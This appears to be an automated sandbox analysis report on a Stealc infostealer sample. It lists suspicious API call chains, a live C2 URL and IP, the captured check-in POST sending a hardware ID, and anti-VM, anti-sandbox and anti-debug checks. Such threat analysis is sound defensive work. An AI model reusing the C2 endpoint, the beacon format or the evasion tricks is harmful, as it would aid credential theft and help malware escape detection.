Source: 0.2.file.exe.20000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.20000.0.unpack	String decryptor: screenshot.jpg

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00039030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00039030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_0002A210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000272A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_000272A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002A2B0 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_0002A2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0002C920

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000340F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_000340F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0002E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00021710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00021710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0002F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000347C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_000347C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00033B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00033B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00034B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00034B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0002DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0002EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0002BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0002DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0002DF10

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.206/6c4adf523b719729.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 36 46 43 41 34 37 37 30 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 2d 2d 0d 0a Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="hwid"D06FCA4770BC4158135236------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="build"tale------KJKEHIIJJECFHJKECFHD--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.206 185.215.113.206

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_000262D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_000262D0

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 36 46 43 41 34 37 37 30 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 2d 2d 0d 0a Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="hwid"D06FCA4770BC4158135236------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="build"tale------KJKEHIIJJECFHJKECFHD--

Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1800359502.0000000001016000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1800359502.0000000001016000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpa-
Source: file.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00060098	0_2_00060098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040317A	0_2_0040317A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00052138	0_2_00052138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118	0_2_00476118
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0007B198	0_2_0007B198
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0008E258	0_2_0008E258
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00064288	0_2_00064288
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000AB308	0_2_000AB308
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047B37C	0_2_0047B37C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0009D39E	0_2_0009D39E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0046F4E4	0_2_0046F4E4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003724CD	0_2_003724CD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0004E544	0_2_0004E544
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00044573	0_2_00044573
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0008D5A8	0_2_0008D5A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000645A8	0_2_000645A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003A3621	0_2_003A3621
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0009A648	0_2_0009A648
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000666C8	0_2_000666C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000A96FD	0_2_000A96FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0007D720	0_2_0007D720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00096799	0_2_00096799
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0048379E	0_2_0048379E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042C7A9	0_2_0042C7A9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00074868	0_2_00074868
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0007B8A8	0_2_0007B8A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004658FB	0_2_004658FB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_000798B8	0_2_000798B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0008F8D6	0_2_0008F8D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0044E8A7	0_2_0044E8A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0036D9E5	0_2_0036D9E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003B7A29	0_2_003B7A29
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00090B88	0_2_00090B88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00358BBD	0_2_00358BBD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00094BA8	0_2_00094BA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047EBF6	0_2_0047EBF6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0009AC28	0_2_0009AC28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00477C17	0_2_00477C17
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0008AD38	0_2_0008AD38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0007BD68	0_2_0007BD68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00051D78	0_2_00051D78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00075DB9	0_2_00075DB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00074DC8	0_2_00074DC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00471D9B	0_2_00471D9B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00479DB9	0_2_00479DB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00068E78	0_2_00068E78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00481E8F	0_2_00481E8F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00091EE8	0_2_00091EE8

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00024610 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: tnleqdlj ZLIB complexity 0.9949933236506746

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00039790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00039790

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00033970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00033970

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\CV4CISNX.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 2146304 > 1048576

Source: file.exe

Static PE information: Raw size of tnleqdlj is bigger than: 0x100000 < 0x1a0e00

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;tnleqdlj:EW;afcdkohf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;tnleqdlj:EW;afcdkohf:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00039BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00039BB0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x210957 should be: 0x21529d

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: tnleqdlj
Source: file.exe	Static PE information: section name: afcdkohf
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B905B push edx; mov dword ptr [esp], esi	0_2_004B9064
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B905B push esi; mov dword ptr [esp], esp	0_2_004B9068
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B905B push esi; mov dword ptr [esp], ecx	0_2_004B927E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005680D4 push edi; mov dword ptr [esp], 788E1011h	0_2_00568101
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005680D4 push ebx; mov dword ptr [esp], ecx	0_2_00568115
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B00F2 push eax; mov dword ptr [esp], ebx	0_2_004B010E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B00F2 push esi; mov dword ptr [esp], ecx	0_2_004B013B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004B00F2 push 433B288Ah; mov dword ptr [esp], ebx	0_2_004B01CC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004A109D push ebp; mov dword ptr [esp], edx	0_2_004A11AA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0004A0DC push eax; retf	0_2_0004A0F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0004A0F2 push eax; retf	0_2_0004A119
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00496178 push 4FB4AD30h; mov dword ptr [esp], esp	0_2_00499740
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040317A push ebx; mov dword ptr [esp], ecx	0_2_004032D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053D11C push 2BB63691h; mov dword ptr [esp], esp	0_2_0053D142
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push edi; mov dword ptr [esp], 04BB119Ch	0_2_00476138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push 0C83DC39h; mov dword ptr [esp], esi	0_2_00476208
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebp; mov dword ptr [esp], eax	0_2_00476275
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push 12EFEBDCh; mov dword ptr [esp], ebp	0_2_00476405
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebx; mov dword ptr [esp], eax	0_2_00476420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebx; mov dword ptr [esp], 7131D4B2h	0_2_00476582
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebx; mov dword ptr [esp], esi	0_2_00476596
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebp; mov dword ptr [esp], 0819E69Ah	0_2_0047659A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push edi; mov dword ptr [esp], ecx	0_2_004765C6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebp; mov dword ptr [esp], 010F8192h	0_2_00476627
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push 177F1F12h; mov dword ptr [esp], edx	0_2_004766DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ecx; mov dword ptr [esp], edi	0_2_004766E1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push esi; mov dword ptr [esp], eax	0_2_00476741
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebp; mov dword ptr [esp], esi	0_2_00476788
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push 3E99096Ch; mov dword ptr [esp], eax	0_2_00476920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push ebx; mov dword ptr [esp], edx	0_2_00476924
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00476118 push 635F0E2Fh; mov dword ptr [esp], edi	0_2_0047693A

Source: file.exe

Static PE information: section name: tnleqdlj entropy: 7.955054294676287

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00039BB0

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4878A9 second address: 4878AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4878AD second address: 4878B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 487B48 second address: 487B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 487E3B second address: 487E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BA8C second address: 48BAAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90D93B4Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jng 00007F3D90D93B54h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BAAC second address: 48BAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BB84 second address: 48BB9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F3D90D93B4Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BB9A second address: 48BBA4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3D90F37F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 48BBA4 second address: 48BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F3D90D93B46h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47FCEB second address: 47FCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47FCF0 second address: 47FCFA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3D90D93B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 47FCFA second address: 47FD34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F3D90F37F48h 0x00000011 pushad 0x00000012 jmp 00007F3D90F37F23h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A9D9A second address: 4A9D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A9D9E second address: 4A9DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3D90F37F1Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AAA99 second address: 4AAA9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
